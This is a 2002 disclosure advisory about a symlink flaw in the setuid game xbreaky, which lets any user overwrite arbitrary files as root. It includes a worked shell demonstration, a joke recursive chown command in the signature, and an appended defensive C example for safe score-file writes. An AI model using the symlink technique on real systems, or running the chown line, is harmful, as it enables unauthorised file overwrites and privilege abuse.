-----------------------------------------------------------------------
Title:            xbreaky symlink vulnerability
Author:           Marco van Berkum
Classification:   High risk
Date:             12/09/2002
Email:            m.v.berkum@obit.nl
Company:          OBIT
Company site:     http://www.obit.nl
Personal website: http://ws.obit.nl
-----------------------------------------------------------------------

About xbreaky
-------------
xbreaky is a breakout game for X written by Dave Brul which can be
downloaded from http://xbreaky.sourceforge.net. xbreaky is included in
the OpenBSD ports tree, the NetBSD tree and possibly others.

Problem
-------
By default xbreaky is installed suid and can be abused by any user to
overwrite any file on the filesystem.

Vulnerable versions
-------------------
All versions prior to 0.0.5

Exploit
-------
xbreaky writes the highscores to $HOME/.breakyhighscores. When
$HOME/.breakyhighscores is a symlink to another file (*any* file),
xbreaky follows the link and simply overwrites that file as the root
user.

Example
-------
root@animal:/home/marco# echo "bla" >rootfile
root@animal:/home/marco# chmod 600 rootfile
root@animal:/home/marco# exit
logout
marco@animal:~$ ln -s rootfile .breakyhighscores
marco@animal:~$ xbreaky

Now I play a game and set highscore as user "lol", then I exit the game.
It's a nice game btw :)

marco@animal:~$ cat rootfile
cat: rootfile: Permission denied
marco@animal:~$ su -
Password:
root@animal:~# cat /home/marco/rootfile
lol   <- voila, our highscore user

Author's response and solution
------------------------------
The author corrected the problem and released xbreaky 0.0.5

Credits
-------
Thanks to Dennis Oelkers for testing.

--
find / -user your -name base -exec chown us:us {}\;
----------------------------------------
| Marco van Berkum / MB17300-RIPE        |
| m.v.berkum@obit.nl / http://ws.obit.nl |
----------------------------------------
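
The following is an added example, not code from xbreaky or from its 0.0.5 fix (the advisory does not describe how the author fixed it). It sketches one way a setuid program can write a per-user score file without the symlink problem described under "Exploit": drop to the invoking user's uid before touching $HOME, and refuse a symlink in the final path component. The function names open_scores_safely and save_score are hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a per-user score file for writing without following a symlink.
 * Returns a descriptor, or -1 if it is not a plain file owned by `owner`. */
int open_scores_safely(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW refuses a symlink in the final path component.
     * No O_TRUNC: nothing is destroyed before the checks below pass. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    /* Check the descriptor, not the path, so the result cannot be raced. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    if (ftruncate(fd, 0) != 0) { close(fd); return -1; }
    return fd;
}

/* Write the score entry with the invoking user's identity, not the
 * setuid one. Returns 0 on success, -1 on refusal or error. */
int save_score(const char *path, const char *entry)
{
    uid_t privileged = geteuid();
    if (seteuid(getuid()) != 0)          /* drop to the real uid first */
        return -1;
    int fd = open_scores_safely(path, getuid());
    int ok = -1;
    if (fd >= 0) {
        size_t len = strlen(entry);
        ok = (write(fd, entry, len) == (ssize_t)len) ? 0 : -1;
        close(fd);
    }
    if (seteuid(privileged) != 0)        /* restore; abort if we cannot */
        abort();
    return ok;
}
```

Dropping the effective uid is the primary control here, because the kernel then applies the invoking user's permissions to every path component; O_NOFOLLOW and the fstat checks are a second layer on the final component only.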